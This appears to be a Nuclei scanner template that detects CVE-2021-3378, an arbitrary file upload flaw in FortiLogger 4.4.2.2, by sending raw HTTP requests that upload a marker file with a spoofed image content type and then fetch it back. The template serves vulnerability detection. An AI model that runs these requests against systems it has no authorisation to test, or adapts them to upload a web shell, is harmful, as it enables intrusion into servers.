id: CVE-2021-3378 info: name: FortiLogger 4.4.2.2 - Arbitrary File Upload author: dwisiswant0 severity: critical description: | FortiLogger 4.4.2.2 is affected by arbitrary file upload issues. Attackers can send a "Content-Type: image/png" header to Config/SaveUploadedHotspotLogoFile and then Assets/temp/hotspot/img/logohotspot.asp. reference: - https://erberkan.github.io/2021/cve-2021-3378/ - https://github.com/erberkan/fortilogger_arbitrary_fileupload - http://packetstormsecurity.com/files/161601/FortiLogger-4.4.2.2-Arbitrary-File-Upload.html - http://packetstormsecurity.com/files/161974/FortiLogger-Arbitrary-File-Upload.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-3378 cwe-id: CWE-434 cpe: cpe:2.3:a:fortilogger:fortilogger:*:*:*:*:*:*:*:* epss-score: 0.19666 tags: fortilogger,fortigate,fortinet,packetstorm,cve,cve2021,fileupload,intrusive metadata: max-request: 2 http: - raw: - | POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS Accept: application/json Referer: {{BaseURL}} Connection: close X-Requested-With: XMLHttpRequest ------WebKitFormBoundarySHHbUsfCoxlX1bpS Content-Disposition: form-data; name="file"; filename="poc.txt" Content-Type: image/png POC_TEST ------WebKitFormBoundarySHHbUsfCoxlX1bpS - | GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "POC_TEST" part: body - type: word words: - "text/plain" - "ASP.NET" condition: and part: header # Enhanced by mp on 2022/05/18